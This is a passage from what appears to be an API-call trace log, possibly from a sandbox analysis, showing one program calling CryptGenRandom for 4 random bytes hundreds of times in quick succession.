hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.402] CryptGenRandom 